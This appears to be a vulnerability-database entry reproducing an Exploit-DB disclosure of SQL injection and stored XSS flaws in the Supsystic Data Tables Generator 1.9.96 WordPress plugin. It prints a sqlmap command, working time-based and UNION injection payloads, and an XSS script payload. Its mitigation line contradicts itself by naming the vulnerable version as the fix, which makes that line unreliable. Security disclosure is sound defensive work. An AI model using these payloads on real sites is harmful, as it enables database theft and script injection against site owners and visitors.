WordPress Plugin Supsystic Data Tables Generator 1.9.96 - Multiple Vulnerabilities

vendor:

Data Tables Generator

by:

Erik David Martin

5.5

CVSS

MEDIUM

SQLi, Stored XSS

89, 79

CWE

Product Name: Data Tables Generator

Affected Version From: 1.9.96

Affected Version To: 1.9.96

Patch Exists: YES

Related CWE:

CPE: a:supsystic:data_tables_generator:1.9.96

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 16.04.6 LTS / WordPress 5.4.2

2020

WordPress Plugin Supsystic Data Tables Generator 1.9.96 – Multiple Vulnerabilities

The POST parameter 'data[search][text_like]' in Supsystic Data Tables Generator plugin does not sanitize user input, leading to a SQL injection vulnerability. Additionally, the plugin is also vulnerable to stored XSS attacks.

Mitigation:

Update to the latest version of the plugin (1.9.96) which fixes the vulnerabilities. Additionally, ensure that user input is properly sanitized and validated before using it in SQL queries and outputting it to web pages.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Supsystic Data Tables Generator 1.9.96 - Multiple Vulnerabilities
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/data-tables-generator-by-supsystic.1.9.96.zip
# Category: Web Application
# Version: 1.9.96
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2

# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 08/12 2020: Vulnerability fixed


##################################
			   SQLi
##################################


# 1. Description

The POST parameter "data[search][text_like]" does not sanitize user input when searching for data.


# 2. Proof of Concept (PoC)

Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
Referer: http://192.168.0.49/wp-admin/admin.php?page=supsystic-tables

sqlmap -r request.txt --dbms=mysql -p data[search][text_like]

Parameter: data[search][text_like] (POST)
	Type: time-based blind
	Payload: route[module]=tables&route[action]=getListForTbl&route[nonce]=5fc3d66b71&data[search][text_like]=t' AND (SELECT 4736 FROM (SELECT(SLEEP(5)))iAJy) AND 'iAVl'='iAVl&data[_search]=false&data[nd]=1595781752940&data[rows]=10&data[page]=1&data[sidx]=id&data[sord]=desc&action=supsystic-tables

	Type: UNION query
	Payload: route[module]=tables&route[action]=getListForTbl&route[nonce]=5fc3d66b71&data[search][text_like]=t' UNION ALL SELECT CONCAT(0x7170707871,0x487a436e5175474a64617446465349535248737249775445424671545a557367704b61424e6d6545,0x7178786b71),NULL-- -&data[_search]=false&data[nd]=1595781752940&data[rows]=10&data[page]=1&data[sidx]=id&data[sord]=desc&action=supsystic-tables



##################################
			Stored XSS
##################################


# 1. Description

The "Editor" tab under the "Tables" section is vulnerable to stored XSS. It is possible to store XSS in all input fields as the code does not sanitize any of the user input.


# 2. Proof of Concept (PoC)

Enter the following payload into any input field:	"><script>alert(1)</script><!--'
The payload is stored in the document and executes whenever a user visits the "Settings" tab or the document itself.
The document is also cached by the plugin. Therefore, the payload can also be executed by any unauthenticated user visting http://192.168.0.49/wp-content/uploads/supsystic-tables/cache/tables/[YOUR TABLE NUMBER]